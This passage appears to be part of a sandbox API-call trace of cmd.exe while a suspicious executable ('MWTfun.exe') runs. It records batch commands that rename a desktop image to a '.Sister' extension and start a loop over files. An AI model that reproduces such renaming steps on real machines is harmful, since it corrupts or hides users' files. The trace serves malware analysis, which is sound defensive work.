dwReserved1=0x80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cf40 [0138.658] FindClose (in: hFindFile=0x21ed8c7cf40 | out: hFindFile=0x21ed8c7cf40) returned 1 [0138.658] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\3Pvsa95E4Bhj9.jpg", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6ca0b80, ftCreationTime.dwHighDateTime=0x1d5ef80, ftLastAccessTime.dwLowDateTime=0xb5f66820, ftLastAccessTime.dwHighDateTime=0x1d5e914, ftLastWriteTime.dwLowDateTime=0xb5f66820, ftLastWriteTime.dwHighDateTime=0x1d5e914, nFileSizeHigh=0x0, nFileSizeLow=0x4ea8, dwReserved0=0x4, dwReserved1=0x80, cFileName="3Pvsa95E4Bhj9.jpg", cAlternateFileName="3PVSA9~1.JPG")) returned 0x21ed8c7cf40 [0138.659] FindClose (in: hFindFile=0x21ed8c7cf40 | out: hFindFile=0x21ed8c7cf40) returned 1 [0138.659] _wcsnicmp (_String1="3PVSA9~1.JPG", _String2="3Pvsa95E4Bhj9.jpg", _MaxCount=0x11) returned 73 [0138.659] malloc (_Size=0x1ff9c) returned 0x21ed90bfff0 [0138.660] ??_V@YAXPEAX@Z () returned 0x21ed90bfff0 [0138.661] GetProcessHeap () returned 0x21ed8c70000 [0138.661] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2c) returned 0x21ed8cc8990 [0138.661] ??_V@YAXPEAX@Z () returned 0x1 [0138.661] ??_V@YAXPEAX@Z () returned 0x1 [0138.663] GetProcessHeap () returned 0x21ed8c70000 [0138.663] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d58b40, Size=0x190) returned 0x21ed8d58b40 [0138.663] GetProcessHeap () returned 0x21ed8c70000 [0138.663] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d58b40) returned 0x190 [0138.663] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0138.664] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.664] GetFileType (hFile=0x50) returned 0x2 [0138.664] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0138.664] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0138.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.669] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0138.704] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0138.704] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0138.705] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0138.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.705] GetFileType (hFile=0x50) returned 0x2 [0138.705] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0138.705] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0138.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.801] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0138.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.964] GetFileType (hFile=0x50) returned 0x2 [0138.964] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0138.964] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0138.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.985] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d58690*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d58690*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0139.098] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"3Pvsa95E4Bhj9.jpg\" \"3Pvsa95E4Bhj9.jpg.Sister\" ") returned 48 [0139.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0139.099] GetFileType (hFile=0x50) returned 0x2 [0139.099] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0139.099] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0139.430] _get_osfhandle (_FileHandle=1) returned 0x50 [0139.430] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x30, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x30) returned 1 [0139.440] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0139.440] _get_osfhandle (_FileHandle=1) returned 0x50 [0139.440] GetFileType (hFile=0x50) returned 0x2 [0139.440] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0139.440] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0139.453] _get_osfhandle (_FileHandle=1) returned 0x50 [0139.453] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0139.457] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0139.457] _get_osfhandle (_FileHandle=1) returned 0x50 [0139.457] GetFileType (hFile=0x50) returned 0x2 [0139.457] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0139.457] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0139.494] _get_osfhandle (_FileHandle=1) returned 0x50 [0139.494] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0139.505] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0139.505] _get_osfhandle (_FileHandle=1) returned 0x50 [0139.505] GetFileType (hFile=0x50) returned 0x2 [0139.505] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0139.505] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0139.511] _get_osfhandle (_FileHandle=1) returned 0x50 [0139.511] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0139.522] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0139.522] _get_osfhandle (_FileHandle=1) returned 0x50 [0139.522] GetFileType (hFile=0x50) returned 0x2 [0139.522] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0139.522] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0139.524] _get_osfhandle (_FileHandle=1) returned 0x50 [0139.524] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0139.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0139.542] GetFileType (hFile=0x50) returned 0x2 [0139.542] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0139.542] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0139.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0139.547] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d58b10*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d58b10*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0139.556] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"3Pvsa95E4Bhj9.jpg.Sister\" \"3Pvsa95E4Bhj9.bat\" ") returned 48 [0139.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0139.556] GetFileType (hFile=0x50) returned 0x2 [0139.556] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0139.556] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0139.567] _get_osfhandle (_FileHandle=1) returned 0x50 [0139.567] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x30, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x30) returned 1 [0139.575] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0139.575] _get_osfhandle (_FileHandle=1) returned 0x50 [0139.575] GetFileType (hFile=0x50) returned 0x2 [0139.575] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0139.575] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0139.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0139.686] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0139.731] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0139.756] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0139.756] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0139.757] malloc (_Size=0xffce) returned 0x21ed90a0040 [0139.758] ??_V@YAXPEAX@Z () returned 0x21ed90a0040 [0139.759] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0139.759] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0139.759] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0139.759] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0139.759] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0139.759] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0139.759] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0139.759] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0139.763] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0139.763] ??_V@YAXPEAX@Z () returned 0x1 [0139.763] GetProcessHeap () returned 0x21ed8c70000 [0139.763] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xd0) returned 0x21ed8cdd160 [0139.763] GetProcessHeap () returned 0x21ed8c70000 [0139.763] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cdd160, Size=0x70) returned 0x21ed8cdd160 [0139.763] GetProcessHeap () returned 0x21ed8c70000 [0139.763] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cdd160) returned 0x70 [0139.763] GetProcessHeap () returned 0x21ed8c70000 [0139.763] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x78) returned 0x21ed8cdd8d0 [0139.764] GetProcessHeap () returned 0x21ed8c70000 [0139.764] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xd0) returned 0x21ed8cdd950 [0139.764] GetProcessHeap () returned 0x21ed8c70000 [0139.764] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cdd950, Size=0x70) returned 0x21ed8cdd950 [0139.764] GetProcessHeap () returned 0x21ed8c70000 [0139.764] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cdd950) returned 0x70 [0139.764] malloc (_Size=0xffce) returned 0x21ed90a0040 [0139.764] ??_V@YAXPEAX@Z () returned 0x21ed90a0040 [0139.764] GetProcessHeap () returned 0x21ed8c70000 [0139.764] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cf40 [0139.764] GetProcessHeap () returned 0x21ed8c70000 [0139.764] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d323b0 [0139.765] _wcsicmp (_String1="3Pvsa95E4Bhj9.jpg", _String2=".") returned 5 [0139.765] _wcsicmp (_String1="3Pvsa95E4Bhj9.jpg", _String2="..") returned 5 [0139.765] GetFileAttributesW (lpFileName="3Pvsa95E4Bhj9.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\3pvsa95e4bhj9.jpg")) returned 0x20 [0139.765] GetProcessHeap () returned 0x21ed8c70000 [0139.765] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9280080 [0139.767] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9280090 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0139.767] SetErrorMode (uMode=0x0) returned 0x0 [0139.767] SetErrorMode (uMode=0x1) returned 0x0 [0139.767] GetFullPathNameW (in: lpFileName="3Pvsa95E4Bhj9.jpg", nBufferLength=0x7fe7, lpBuffer=0x21ed90a0040, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\3Pvsa95E4Bhj9.jpg", lpFilePart=0xa6cf4fd660*="3Pvsa95E4Bhj9.jpg") returned 0x29 [0139.768] SetErrorMode (uMode=0x0) returned 0x1 [0139.768] GetProcessHeap () returned 0x21ed8c70000 [0139.768] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d30670 [0139.768] _wcsicmp (_String1="3Pvsa95E4Bhj9.jpg", _String2=".") returned 5 [0139.768] _wcsicmp (_String1="3Pvsa95E4Bhj9.jpg", _String2="..") returned 5 [0139.768] GetFileAttributesW (lpFileName="3Pvsa95E4Bhj9.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\3pvsa95e4bhj9.jpg")) returned 0x20 [0139.768] ??_V@YAXPEAX@Z () returned 0x1 [0139.768] malloc (_Size=0xffce) returned 0x21ed90a0040 [0139.768] ??_V@YAXPEAX@Z () returned 0x21ed90a0040 [0139.769] malloc (_Size=0xffce) returned 0x21ed90b0020 [0139.769] ??_V@YAXPEAX@Z () returned 0x21ed90b0020 [0139.769] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\3Pvsa95E4Bhj9.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\3pvsa95e4bhj9.jpg")) returned 0x20 [0139.770] malloc (_Size=0xffce) returned 0x21ed90c0000 [0139.770] ??_V@YAXPEAX@Z () returned 0x21ed90c0000 [0139.771] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\3Pvsa95E4Bhj9.jpg", fInfoLevelId=0x1, lpFindFileData=0x21ed8d323c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d323c0) returned 0x21ed8d431b0 [0139.771] malloc (_Size=0xffce) returned 0x21ed90cffe0 [0139.771] ??_V@YAXPEAX@Z () returned 0x21ed90cffe0 [0139.772] ??_V@YAXPEAX@Z () returned 0x1 [0139.772] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\3Pvsa95E4Bhj9.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\3pvsa95e4bhj9.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\3Pvsa95E4Bhj9.jpg.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\3pvsa95e4bhj9.jpg.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0139.773] FindNextFileW (in: hFindFile=0x21ed8d431b0, lpFindFileData=0x21ed8d323c0 | out: lpFindFileData=0x21ed8d323c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6ca0b80, ftCreationTime.dwHighDateTime=0x1d5ef80, ftLastAccessTime.dwLowDateTime=0xb5f66820, ftLastAccessTime.dwHighDateTime=0x1d5e914, ftLastWriteTime.dwLowDateTime=0xb5f66820, ftLastWriteTime.dwHighDateTime=0x1d5e914, nFileSizeHigh=0x0, nFileSizeLow=0x4ea8, dwReserved0=0x0, dwReserved1=0x0, cFileName="3Pvsa95E4Bhj9.jpg", cAlternateFileName="")) returned 0 [0139.775] GetLastError () returned 0x12 [0139.775] FindClose (in: hFindFile=0x21ed8d431b0 | out: hFindFile=0x21ed8d431b0) returned 1 [0139.775] ??_V@YAXPEAX@Z () returned 0x1 [0139.779] ??_V@YAXPEAX@Z () returned 0x1 [0139.779] ??_V@YAXPEAX@Z () returned 0x1 [0139.781] ??_V@YAXPEAX@Z () returned 0x1 [0139.781] GetProcessHeap () returned 0x21ed8c70000 [0139.781] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d42eb0 [0139.781] GetProcessHeap () returned 0x21ed8c70000 [0139.781] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95780, Size=0x16) returned 0x21ed8c957e0 [0139.781] GetProcessHeap () returned 0x21ed8c70000 [0139.781] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c957e0) returned 0x16 [0139.781] GetProcessHeap () returned 0x21ed8c70000 [0139.781] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0139.781] GetProcessHeap () returned 0x21ed8c70000 [0139.781] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0139.781] GetProcessHeap () returned 0x21ed8c70000 [0139.781] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8cdd9d0 [0139.781] GetProcessHeap () returned 0x21ed8c70000 [0139.781] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cdd9d0, Size=0xb2) returned 0x21ed8cdd9d0 [0139.781] GetProcessHeap () returned 0x21ed8c70000 [0139.781] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cdd9d0) returned 0xb2 [0139.781] GetProcessHeap () returned 0x21ed8c70000 [0139.781] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d58ce0 [0139.781] GetProcessHeap () returned 0x21ed8c70000 [0139.781] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d58ce0, Size=0x30) returned 0x21ed8d58ce0 [0139.781] GetProcessHeap () returned 0x21ed8c70000 [0139.781] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d58ce0) returned 0x30 [0139.781] GetProcessHeap () returned 0x21ed8c70000 [0139.781] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d58d20 [0139.781] malloc (_Size=0x1ff9c) returned 0x21ed90a0040 [0139.785] GetProcessHeap () returned 0x21ed8c70000 [0139.785] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8d48110 [0139.785] GetProcessHeap () returned 0x21ed8c70000 [0139.785] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed8d478d0 [0139.785] ??_V@YAXPEAX@Z () returned 0x1 [0139.787] malloc (_Size=0x1ff9c) returned 0x21ed90a0040 [0139.791] GetProcessHeap () returned 0x21ed8c70000 [0139.791] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8d475d0 [0139.791] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed90a0040, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0139.792] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xea3ae5a1, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d43750 [0139.792] FindClose (in: hFindFile=0x21ed8d43750 | out: hFindFile=0x21ed8d43750) returned 1 [0139.792] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xea3ae5a1, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d438d0 [0139.792] FindClose (in: hFindFile=0x21ed8d438d0 | out: hFindFile=0x21ed8d438d0) returned 1 [0139.793] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7deb79c5, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x7deb79c5, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xea3ae5a1, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d439f0 [0139.793] FindClose (in: hFindFile=0x21ed8d439f0 | out: hFindFile=0x21ed8d439f0) returned 1 [0139.793] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29182c00, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0x29182c00, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x6a501200, ftLastWriteTime.dwHighDateTime=0x1d61406, nFileSizeHigh=0x0, nFileSizeLow=0x40800, dwReserved0=0x21e, dwReserved1=0xea3ae5a1, cFileName="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", cAlternateFileName="CUSERS~1.EXE")) returned 0x21ed8d431b0 [0139.793] FindClose (in: hFindFile=0x21ed8d431b0 | out: hFindFile=0x21ed8d431b0) returned 1 [0139.793] _wcsnicmp (_String1="CUSERS~1.EXE", _String2="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", _MaxCount=0x35) returned 22 [0139.793] malloc (_Size=0x1ff9c) returned 0x21ed90bfff0 [0139.793] ??_V@YAXPEAX@Z () returned 0x21ed90bfff0 [0139.794] GetProcessHeap () returned 0x21ed8c70000 [0139.795] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8cddaa0 [0139.795] ??_V@YAXPEAX@Z () returned 0x1 [0139.795] ??_V@YAXPEAX@Z () returned 0x1 [0139.798] GetProcessHeap () returned 0x21ed8c70000 [0139.798] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d58d20, Size=0x490) returned 0x21ed8d58d20 [0139.798] GetProcessHeap () returned 0x21ed8c70000 [0139.798] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d58d20) returned 0x490 [0139.798] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0139.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0139.798] GetFileType (hFile=0x50) returned 0x2 [0139.798] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0139.798] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0139.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0139.895] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0139.920] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0139.921] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0139.921] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0139.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0139.921] GetFileType (hFile=0x50) returned 0x2 [0139.921] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0139.921] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0139.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0139.936] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, 